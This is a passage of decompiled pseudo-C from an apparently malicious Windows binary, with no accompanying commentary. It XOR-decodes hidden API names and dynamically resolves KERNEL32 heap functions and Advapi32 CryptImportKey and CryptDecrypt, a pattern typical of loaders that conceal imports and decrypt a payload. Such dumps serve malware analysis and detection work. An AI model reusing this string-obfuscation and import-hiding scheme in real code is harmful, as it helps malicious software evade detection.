					E736D82C0("KERNEL32.dll",  &_a209, _t720);
					_t805 = _t805 + 0xc;
				}
				_a245 = 0;
				_a249 = 0x6c321b09;
				_a253 = 0x10531207;
				_a257 = 0x4e0c3a6c;
				_a261 = 0x22605e42;
				if(_a245 == 0) {
					_t786 = 0;
					do {
						 *(_t805 + 0xf8 + _t786 * 4) =  *(_t805 + 0xf8 + _t786 * 4) ^ 0x22605e42;
						_t786 = _t786 + 1;
					} while (_t786 < 4);
				}
				_a225 = 0;
				_a229 = 0x37f22890;
				_a233 = 0x2e522a5;
				_a237 = 0x2ce3ea4;
				_a241 = 0x67863db6;
				if(_a225 == 0) {
					_t785 = 0;
					do {
						 *(_t805 + 0xe4 + _t785 * 4) =  *(_t805 + 0xe4 + _t785 * 4) ^ 0x67864dd7;
						_t785 = _t785 + 1;
					} while (_t785 < 4);
				}
				E736D7DE0(_t796, "GetProcessHeap", 0, 0x200);
				_t721 = 0;
				 *0x736f0558 = 0;
				_t806 = _t805 + 0xc;
				_t534 =  &_a229;
				if(_a229 != 0) {
					do {
						_t534 = _t534 + 1;
						_t721 = _t721 + 1;
                                                                                                                                                                                                                                					} while ( *_t534 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t722 = _t721 + 1;
                                                                                                                                                                                                                                				if(_t721 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("GetProcessHeap",  &_a229, _t722);
                                                                                                                                                                                                                                					_t806 = _t806 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t723 = 0;
                                                                                                                                                                                                                                				_t535 =  &_a249;
                                                                                                                                                                                                                                				if(_a249 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t535 = _t535 + 1;
                                                                                                                                                                                                                                						_t723 = _t723 + 1;
                                                                                                                                                                                                                                					} while ( *_t535 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t724 = _t723 + 1;
                                                                                                                                                                                                                                				if(_t723 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("KERNEL32.dll",  &_a249, _t724);
                                                                                                                                                                                                                                					_t806 = _t806 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a265 = 0;
                                                                                                                                                                                                                                				_a269 = 0x536db481;
                                                                                                                                                                                                                                				_a273 = 0x2f0cbd8f;
                                                                                                                                                                                                                                				_a277 = 0x715395e4;
                                                                                                                                                                                                                                				_a281 = 0x1d3ff1ca;
                                                                                                                                                                                                                                				if(_a265 == 0) {
                                                                                                                                                                                                                                					_t784 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t806 + 0x10c + _t784 * 4) =  *(_t806 + 0x10c + _t784 * 4) ^ 0x1d3ff1ca;
                                                                                                                                                                                                                                						_t784 = _t784 + 1;
                                                                                                                                                                                                                                					} while (_t784 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a21 = 0;
                                                                                                                                                                                                                                				_a25 = 0x14ad5a47;
                                                                                                                                                                                                                                				_a29 = 0xba0534e;
                                                                                                                                                                                                                                				_a33 = 0x64cc3f6c;
                                                                                                                                                                                                                                				if(_a21 == 0) {
                                                                                                                                                                                                                                					_t783 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t806 + 0x18 + _t783 * 4) =  *(_t806 + 0x18 + _t783 * 4) ^ 0x64cc3f0f;
                                                                                                                                                                                                                                						_t783 = _t783 + 1;
                                                                                                                                                                                                                                					} while (_t783 < 3);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t796, "HeapAlloc", 0, 0x200);
                                                                                                                                                                                                                                				_t725 = 0;
                                                                                                                                                                                                                                				 *0x736f075c = 0;
                                                                                                                                                                                                                                				_t807 = _t806 + 0xc;
                                                                                                                                                                                                                                				_t539 =  &_a25;
                                                                                                                                                                                                                                				if(_a25 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t539 = _t539 + 1;
                                                                                                                                                                                                                                						_t725 = _t725 + 1;
                                                                                                                                                                                                                                					} while ( *_t539 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t726 = _t725 + 1;
                                                                                                                                                                                                                                				if(_t725 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("HeapAlloc",  &_a25, _t726);
                                                                                                                                                                                                                                					_t807 = _t807 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t727 = 0;
                                                                                                                                                                                                                                				_t540 =  &_a269;
                                                                                                                                                                                                                                				if(_a269 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t540 = _t540 + 1;
                                                                                                                                                                                                                                						_t727 = _t727 + 1;
                                                                                                                                                                                                                                					} while ( *_t540 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t728 = _t727 + 1;
                                                                                                                                                                                                                                				if(_t727 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("KERNEL32.dll",  &_a269, _t728);
                                                                                                                                                                                                                                					_t807 = _t807 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a285 = 0;
                                                                                                                                                                                                                                				_a289 = 0xa842660;
                                                                                                                                                                                                                                				_a293 = 0x76e52f6e;
                                                                                                                                                                                                                                				_a297 = 0x28ba0705;
                                                                                                                                                                                                                                				_a301 = 0x44d6632b;
                                                                                                                                                                                                                                				if(_a285 == 0) {
                                                                                                                                                                                                                                					_t782 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t807 + 0x120 + _t782 * 4) =  *(_t807 + 0x120 + _t782 * 4) ^ 0x44d6632b;
                                                                                                                                                                                                                                						_t782 = _t782 + 1;
                                                                                                                                                                                                                                					} while (_t782 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a37 = 0;
                                                                                                                                                                                                                                				_a41 = 0x217a618e;
                                                                                                                                                                                                                                				_a45 = 0x34616d95;
                                                                                                                                                                                                                                				_a49 = 0x511b04c6;
                                                                                                                                                                                                                                				if(_a37 == 0) {
                                                                                                                                                                                                                                					_t781 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t807 + 0x28 + _t781 * 4) =  *(_t807 + 0x28 + _t781 * 4) ^ 0x511b04c6;
                                                                                                                                                                                                                                						_t781 = _t781 + 1;
                                                                                                                                                                                                                                					} while (_t781 < 3);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t796, "HeapSize", 0, 0x200);
                                                                                                                                                                                                                                				_t729 = 0;
                                                                                                                                                                                                                                				 *0x736f0960 = 0;
                                                                                                                                                                                                                                				_t808 = _t807 + 0xc;
                                                                                                                                                                                                                                				_t544 =  &_a41;
                                                                                                                                                                                                                                				if(_a41 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t544 = _t544 + 1;
                                                                                                                                                                                                                                						_t729 = _t729 + 1;
                                                                                                                                                                                                                                					} while ( *_t544 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t730 = _t729 + 1;
                                                                                                                                                                                                                                				if(_t729 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("HeapSize",  &_a41, _t730);
                                                                                                                                                                                                                                					_t808 = _t808 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t731 = 0;
				_t545 =  &_a289;
				if(_a289 != 0) {
					do {
						_t545 = _t545 + 1;
						_t731 = _t731 + 1;
					} while ( *_t545 != 0);
				}
				_t732 = _t731 + 1;
				if(_t731 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a289, _t732);
					_t808 = _t808 + 0xc;
				}
				_a305 = 0;
				_a309 = 0x386f5c37;
				_a313 = 0x440e5539;
				_a317 = 0x1a517d52;
				_a321 = 0x763d197c;
				if(_a305 == 0) {
					_t780 = 0;
					do {
						 *(_t808 + 0x134 + _t780 * 4) =  *(_t808 + 0x134 + _t780 * 4) ^ 0x763d197c;
						_t780 = _t780 + 1;
					} while (_t780 < 4);
				}
				_a53 = 0;
				_a57 = 0x2769f945;
				_a61 = 0x326dee4b;
				_a65 = 0x57089c0d;
				if(_a53 == 0) {
					_t779 = 0;
					do {
						 *(_t808 + 0x38 + _t779 * 4) =  *(_t808 + 0x38 + _t779 * 4) ^ 0x57089c0d;
						_t779 = _t779 + 1;
					} while (_t779 < 3);
				}
				E736D7DE0(_t796, "HeapFree", 0, 0x200);
				_t733 = 0;
				 *0x736f0b64 = 0;
				_t809 = _t808 + 0xc;
				_t549 =  &_a57;
				if(_a57 != 0) {
					do {
						_t549 = _t549 + 1;
						_t733 = _t733 + 1;
					} while ( *_t549 != 0);
				}
				_t734 = _t733 + 1;
				if(_t733 + 1 != 0) {
					E736D82C0("HeapFree",  &_a57, _t734);
					_t809 = _t809 + 0xc;
				}
				_t735 = 0;
				_t550 =  &_a309;
				if(_a309 != 0) {
					do {
						_t550 = _t550 + 1;
						_t735 = _t735 + 1;
					} while ( *_t550 != 0);
				}
				_t736 = _t735 + 1;
				if(_t735 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a309, _t736);
					_t809 = _t809 + 0xc;
				}
				_a325 = 0;
				_a329 = 0x7aa1122f;
				_a333 = 0x6c01b21;
				_a337 = 0x589f334a;
				_a341 = 0x34f35764;
				if(_a325 == 0) {
					_t778 = 0;
					do {
						 *(_t809 + 0x148 + _t778 * 4) =  *(_t809 + 0x148 + _t778 * 4) ^ 0x34f35764;
						_t778 = _t778 + 1;
					} while (_t778 < 4);
				}
				_a69 = 0;
				_a73 = 0x55357ead;
				_a77 = 0x49157eb7;
				_a81 = 0x25377489;
				if(_a69 == 0) {
					_t777 = 0;
					do {
						 *(_t809 + 0x48 + _t777 * 4) =  *(_t809 + 0x48 + _t777 * 4) ^ 0x25541be5;
						_t777 = _t777 + 1;
					} while (_t777 < 3);
				}
				E736D7DE0(_t796, "HeapReAlloc", 0, 0x200);
				_t737 = 0;
				 *0x736f0d68 = 0;
				_t810 = _t809 + 0xc;
				_t554 =  &_a73;
				if(_a73 != 0) {
					do {
						_t554 = _t554 + 1;
						_t737 = _t737 + 1;
					} while ( *_t554 != 0);
				}
				_t738 = _t737 + 1;
				if(_t737 + 1 != 0) {
					E736D82C0("HeapReAlloc",  &_a73, _t738);
					_t810 = _t810 + 0xc;
				}
				_t739 = 0;
				_t555 =  &_a329;
				if(_a329 != 0) {
					do {
						_t555 = _t555 + 1;
						_t739 = _t739 + 1;
					} while ( *_t555 != 0);
				}
				_t740 = _t739 + 1;
				if(_t739 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a329, _t740);
					_t810 = _t810 + 0xc;
				}
				_a345 = 0;
				_a349 = 0x290f8965;
				_a353 = 0x7a4a8454;
				_a357 = 0x2415890a;
				_a361 = 0x4879ed24;
				if(_a345 == 0) {
					_t776 = 0;
					do {
						 *(_t810 + 0x15c + _t776 * 4) =  *(_t810 + 0x15c + _t776 * 4) ^ 0x4879ed24;
						_t776 = _t776 + 1;
					} while (_t776 < 4);
				}
				_a573 = 0;
				_a577 = 0x2397147f;
				_a581 = 0x228d2748;
				_a585 = 0x369c0f49;
				_a589 = 0x2780097f;
				_a593 = 0x129a1e59;
				_a597 = 0x53ee663c;
				if(_a573 == 0) {
					_t775 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t810 + 0x240 + _t775 * 4) =  *(_t810 + 0x240 + _t775 * 4) ^ 0x53ee663c;
						_t775 = _t775 + 1;
					} while (_t775 < 6);
				}
				E736D7DE0(_t796, "CryptAcquireContextA", 0, 0x200);
				_t741 = 0;
				 *0x736f0f6c = 0;
				_t811 = _t810 + 0xc;
                                                                                                                                                                                                                                				_t559 =  &_a577;
                                                                                                                                                                                                                                				if(_a577 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t559 = _t559 + 1;
                                                                                                                                                                                                                                						_t741 = _t741 + 1;
                                                                                                                                                                                                                                					} while ( *_t559 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t742 = _t741 + 1;
                                                                                                                                                                                                                                				if(_t741 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptAcquireContextA",  &_a577, _t742);
                                                                                                                                                                                                                                					_t811 = _t811 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t743 = 0;
                                                                                                                                                                                                                                				_t560 =  &_a349;
                                                                                                                                                                                                                                				if(_a349 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t560 = _t560 + 1;
                                                                                                                                                                                                                                						_t743 = _t743 + 1;
                                                                                                                                                                                                                                					} while ( *_t560 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t744 = _t743 + 1;
                                                                                                                                                                                                                                				if(_t743 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("Advapi32.dll",  &_a349, _t744);
                                                                                                                                                                                                                                					_t811 = _t811 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a385 = 0;
                                                                                                                                                                                                                                				_a389 = 0x37ec02a5;
                                                                                                                                                                                                                                				_a393 = 0x64a90f94;
                                                                                                                                                                                                                                				_a397 = 0x3af602ca;
                                                                                                                                                                                                                                				_a401 = 0x569a66e4;
                                                                                                                                                                                                                                				if(_a385 == 0) {
                                                                                                                                                                                                                                					_t774 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t811 + 0x184 + _t774 * 4) =  *(_t811 + 0x184 + _t774 * 4) ^ 0x569a66e4;
                                                                                                                                                                                                                                						_t774 = _t774 + 1;
                                                                                                                                                                                                                                					} while (_t774 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a365 = 0;
                                                                                                                                                                                                                                				_a369 = 0x4cc6a43f;
                                                                                                                                                                                                                                				_a373 = 0x4cd29f08;
                                                                                                                                                                                                                                				_a377 = 0x77cba413;
                                                                                                                                                                                                                                				_a381 = 0x3cbfaf19;
                                                                                                                                                                                                                                				if(_a365 == 0) {
                                                                                                                                                                                                                                					_t773 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t811 + 0x170 + _t773 * 4) =  *(_t811 + 0x170 + _t773 * 4) ^ 0x3cbfd67c;
                                                                                                                                                                                                                                						_t773 = _t773 + 1;
                                                                                                                                                                                                                                					} while (_t773 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t796, "CryptImportKey", 0, 0x200);
                                                                                                                                                                                                                                				_t745 = 0;
                                                                                                                                                                                                                                				 *0x736f1170 = 0;
                                                                                                                                                                                                                                				_t812 = _t811 + 0xc;
                                                                                                                                                                                                                                				_t564 =  &_a369;
                                                                                                                                                                                                                                				if(_a369 != 0) {
                                                                                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t564 = _t564 + 1;
                                                                                                                                                                                                                                						_t745 = _t745 + 1;
                                                                                                                                                                                                                                					} while ( *_t564 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t746 = _t745 + 1;
                                                                                                                                                                                                                                				if(_t745 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptImportKey",  &_a369, _t746);
                                                                                                                                                                                                                                					_t812 = _t812 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t747 = 0;
                                                                                                                                                                                                                                				_t565 =  &_a389;
                                                                                                                                                                                                                                				if(_a389 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t565 = _t565 + 1;
                                                                                                                                                                                                                                						_t747 = _t747 + 1;
                                                                                                                                                                                                                                					} while ( *_t565 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t748 = _t747 + 1;
                                                                                                                                                                                                                                				if(_t747 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("Advapi32.dll",  &_a389, _t748);
                                                                                                                                                                                                                                					_t812 = _t812 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a405 = 0;
                                                                                                                                                                                                                                				_a409 = 0x2434a20a;
                                                                                                                                                                                                                                				_a413 = 0x7771af3b;
                                                                                                                                                                                                                                				_a417 = 0x292ea265;
                                                                                                                                                                                                                                				_a421 = 0x4542c64b;
                                                                                                                                                                                                                                				if(_a405 == 0) {
                                                                                                                                                                                                                                					_t772 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t812 + 0x198 + _t772 * 4) =  *(_t812 + 0x198 + _t772 * 4) ^ 0x4542c64b;
                                                                                                                                                                                                                                						_t772 = _t772 + 1;
                                                                                                                                                                                                                                					} while (_t772 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a525 = 0;
                                                                                                                                                                                                                                				_a529 = 0x42a070fe;
                                                                                                                                                                                                                                				_a533 = 0x46bc51c9;
                                                                                                                                                                                                                                				_a537 = 0x62a067f6;
                                                                                                                                                                                                                                				_a541 = 0x5fb870dc;
                                                                                                                                                                                                                                				_a545 = 0x32d902bd;
                                                                                                                                                                                                                                				if(_a525 == 0) {
                                                                                                                                                                                                                                					_t771 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t812 + 0x210 + _t771 * 4) =  *(_t812 + 0x210 + _t771 * 4) ^ 0x32d902bd;
                                                                                                                                                                                                                                						_t771 = _t771 + 1;
                                                                                                                                                                                                                                					} while (_t771 < 5);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t796, "CryptSetKeyParam", 0, 0x200);
                                                                                                                                                                                                                                				_t749 = 0;
                                                                                                                                                                                                                                				 *0x736f1374 = 0;
                                                                                                                                                                                                                                				_t813 = _t812 + 0xc;
                                                                                                                                                                                                                                				_t569 =  &_a529;
                                                                                                                                                                                                                                				if(_a529 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t569 = _t569 + 1;
                                                                                                                                                                                                                                						_t749 = _t749 + 1;
                                                                                                                                                                                                                                					} while ( *_t569 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t750 = _t749 + 1;
                                                                                                                                                                                                                                				if(_t749 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptSetKeyParam",  &_a529, _t750);
                                                                                                                                                                                                                                					_t813 = _t813 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t751 = 0;
                                                                                                                                                                                                                                				_t570 =  &_a409;
                                                                                                                                                                                                                                				if(_a409 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t570 = _t570 + 1;
                                                                                                                                                                                                                                						_t751 = _t751 + 1;
                                                                                                                                                                                                                                					} while ( *_t570 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t752 = _t751 + 1;
                                                                                                                                                                                                                                				if(_t751 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("Advapi32.dll",  &_a409, _t752);
                                                                                                                                                                                                                                					_t813 = _t813 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a445 = 0;
                                                                                                                                                                                                                                				_a449 = 0x260dcedd;
                                                                                                                                                                                                                                				_a453 = 0x7548c3ec;
                                                                                                                                                                                                                                				_a457 = 0x2b17ceb2;
                                                                                                                                                                                                                                				_a461 = 0x477baa9c;
                                                                                                                                                                                                                                				if(_a445 == 0) {
                                                                                                                                                                                                                                					_t770 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t813 + 0x1c0 + _t770 * 4) =  *(_t813 + 0x1c0 + _t770 * 4) ^ 0x477baa9c;
                                                                                                                                                                                                                                						_t770 = _t770 + 1;
                                                                                                                                                                                                                                					} while (_t770 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a425 = 0;
                                                                                                                                                                                                                                				_a429 = 0x529117ae;
                                                                                                                                                                                                                                				_a433 = 0x418d2199;
                                                                                                                                                                                                                                				_a437 = 0x56981c9f;
                                                                                                                                                                                                                                				_a441 = 0x22e865ed;
                                                                                                                                                                                                                                				if(_a425 == 0) {
                                                                                                                                                                                                                                					_t769 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t813 + 0x1ac + _t769 * 4) =  *(_t813 + 0x1ac + _t769 * 4) ^ 0x22e865ed;
                                                                                                                                                                                                                                						_t769 = _t769 + 1;
                                                                                                                                                                                                                                					} while (_t769 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t796, "CryptDecrypt", 0, 0x200);
                                                                                                                                                                                                                                				_t753 = 0;
                                                                                                                                                                                                                                				 *0x736f1578 = 0;
                                                                                                                                                                                                                                				_t814 = _t813 + 0xc;
                                                                                                                                                                                                                                				_t574 =  &_a429;
                                                                                                                                                                                                                                				if(_a429 != 0) {
                                                                                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t574 = _t574 + 1;
                                                                                                                                                                                                                                						_t753 = _t753 + 1;
                                                                                                                                                                                                                                					} while ( *_t574 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t754 = _t753 + 1;
                                                                                                                                                                                                                                				if(_t753 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptDecrypt",  &_a429, _t754);
                                                                                                                                                                                                                                					_t814 = _t814 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t755 = 0;
                                                                                                                                                                                                                                				_t575 =  &_a449;
                                                                                                                                                                                                                                				if(_a449 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t575 = _t575 + 1;
                                                                                                                                                                                                                                						_t755 = _t755 + 1;
                                                                                                                                                                                                                                					} while ( *_t575 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t756 = _t755 + 1;
                                                                                                                                                                                                                                				if(_t755 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("Advapi32.dll",  &_a449, _t756);
                                                                                                                                                                                                                                					_t814 = _t814 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a485 = 0;
                                                                                                                                                                                                                                				_a489 = 0x4f0c909c;
                                                                                                                                                                                                                                				_a493 = 0x1c499dad;
                                                                                                                                                                                                                                				_a497 = 0x421690f3;
                                                                                                                                                                                                                                				_a501 = 0x2e7af4dd;
                                                                                                                                                                                                                                				if(_a485 == 0) {
                                                                                                                                                                                                                                					_t768 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t814 + 0x1e8 + _t768 * 4) =  *(_t814 + 0x1e8 + _t768 * 4) ^ 0x2e7af4dd;
                                                                                                                                                                                                                                						_t768 = _t768 + 1;
                                                                                                                                                                                                                                					} while (_t768 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a465 = 0;
                                                                                                                                                                                                                                				_a469 = 0x77849587;
                                                                                                                                                                                                                                				_a473 = 0x7498a3b0;
                                                                                                                                                                                                                                				_a477 = 0x7e9295b0;
                                                                                                                                                                                                                                				_a481 = 0x784828f;
                                                                                                                                                                                                                                				if(_a465 == 0) {
                                                                                                                                                                                                                                					_t767 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t814 + 0x1d4 + _t767 * 4) =  *(_t814 + 0x1d4 + _t767 * 4) ^ 0x07fde7c4;
                                                                                                                                                                                                                                						_t767 = _t767 + 1;
                                                                                                                                                                                                                                					} while (_t767 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t796, "CryptDestroyKey", 0, 0x200);
                                                                                                                                                                                                                                				_t757 = 0;
                                                                                                                                                                                                                                				 *0x736f177c = 0;
                                                                                                                                                                                                                                				_t815 = _t814 + 0xc;
                                                                                                                                                                                                                                				_t579 =  &_a469;
                                                                                                                                                                                                                                				if(_a469 != 0) {
                                                                                                                                                                                                                                					asm("o16 nop [eax+eax]");
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t579 = _t579 + 1;
                                                                                                                                                                                                                                						_t757 = _t757 + 1;
                                                                                                                                                                                                                                					} while ( *_t579 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t758 = _t757 + 1;
                                                                                                                                                                                                                                				if(_t757 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptDestroyKey",  &_a469, _t758);
                                                                                                                                                                                                                                					_t815 = _t815 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t759 = 0;
                                                                                                                                                                                                                                				_t580 =  &_a489;
                                                                                                                                                                                                                                				if(_a489 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t580 = _t580 + 1;
                                                                                                                                                                                                                                						_t759 = _t759 + 1;
                                                                                                                                                                                                                                					} while ( *_t580 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t760 = _t759 + 1;
                                                                                                                                                                                                                                				if(_t759 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("Advapi32.dll",  &_a489, _t760);
                                                                                                                                                                                                                                					_t815 = _t815 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a505 = 0;
                                                                                                                                                                                                                                				_a509 = 0x7c8eb3f4;
                                                                                                                                                                                                                                				_a513 = 0x2fcbbec5;
                                                                                                                                                                                                                                				_a517 = 0x7194b39b;
                                                                                                                                                                                                                                				_a521 = 0x1df8d7b5;
                                                                                                                                                                                                                                				if(_a505 == 0) {
                                                                                                                                                                                                                                					_t766 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t815 + 0x1fc + _t766 * 4) =  *(_t815 + 0x1fc + _t766 * 4) ^ 0x1df8d7b5;
                                                                                                                                                                                                                                						_t766 = _t766 + 1;
                                                                                                                                                                                                                                					} while (_t766 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_a549 = 0;
                                                                                                                                                                                                                                				_a553 = 0x7a18ab6f;
                                                                                                                                                                                                                                				_a557 = 0x66048b58;
                                                                                                                                                                                                                                				_a561 = 0x6f12b849;
                                                                                                                                                                                                                                				_a565 = 0x7e0fb66f;
                                                                                                                                                                                                                                				_a569 = 0xa15a149;
                                                                                                                                                                                                                                				if(_a549 == 0) {
                                                                                                                                                                                                                                					_t765 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t815 + 0x228 + _t765 * 4) =  *(_t815 + 0x228 + _t765 * 4) ^ 0x0a61d92c;
                                                                                                                                                                                                                                						_t765 = _t765 + 1;
                                                                                                                                                                                                                                					} while (_t765 < 5);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t796, "CryptReleaseContext", 0, 0x200);
                                                                                                                                                                                                                                				_t761 = 0;
                                                                                                                                                                                                                                				 *0x736f1980 = 0;
                                                                                                                                                                                                                                				_t816 = _t815 + 0xc;
                                                                                                                                                                                                                                				_t584 =  &_a553;
                                                                                                                                                                                                                                				if(_a553 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t584 = _t584 + 1;
                                                                                                                                                                                                                                						_t761 = _t761 + 1;
                                                                                                                                                                                                                                					} while ( *_t584 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t762 = _t761 + 1;
                                                                                                                                                                                                                                				if(_t761 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptReleaseContext",  &_a553, _t762);
                                                                                                                                                                                                                                					_t816 = _t816 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t763 = 0;
                                                                                                                                                                                                                                				_t585 =  &_a509;
                                                                                                                                                                                                                                				if(_a509 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t585 = _t585 + 1;
                                                                                                                                                                                                                                						_t763 = _t763 + 1;
                                                                                                                                                                                                                                					} while ( *_t585 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t764 = _t763 + 1;
                                                                                                                                                                                                                                				if(_t763 + 1 != 0) {
                                                                                                                                                                                                                                					_t585 = E736D82C0("Advapi32.dll",  &_a509, _t764);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t585;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                0x736d4ab6
                                                                                                                                                                                                                                0x736d4ab9
                                                                                                                                                                                                                                0x736d4ac7
                                                                                                                                                                                                                                0x736d4ad0
                                                                                                                                                                                                                                0x736d4ad0
                                                                                                                                                                                                                                0x736d4ad3
                                                                                                                                                                                                                                0x736d4ad4
                                                                                                                                                                                                                                0x736d4ad0
                                                                                                                                                                                                                                0x736d4ad9
                                                                                                                                                                                                                                0x736d4adc
                                                                                                                                                                                                                                0x736d4aec
                                                                                                                                                                                                                                0x736d4af1
                                                                                                                                                                                                                                0x736d4af1
                                                                                                                                                                                                                                0x736d4af4
                                                                                                                                                                                                                                0x736d4af6
                                                                                                                                                                                                                                0x736d4b04
                                                                                                                                                                                                                                0x736d4b06
                                                                                                                                                                                                                                0x736d4b06
                                                                                                                                                                                                                                0x736d4b09
                                                                                                                                                                                                                                0x736d4b0a
                                                                                                                                                                                                                                0x736d4b06
                                                                                                                                                                                                                                0x736d4b0f
                                                                                                                                                                                                                                0x736d4b12
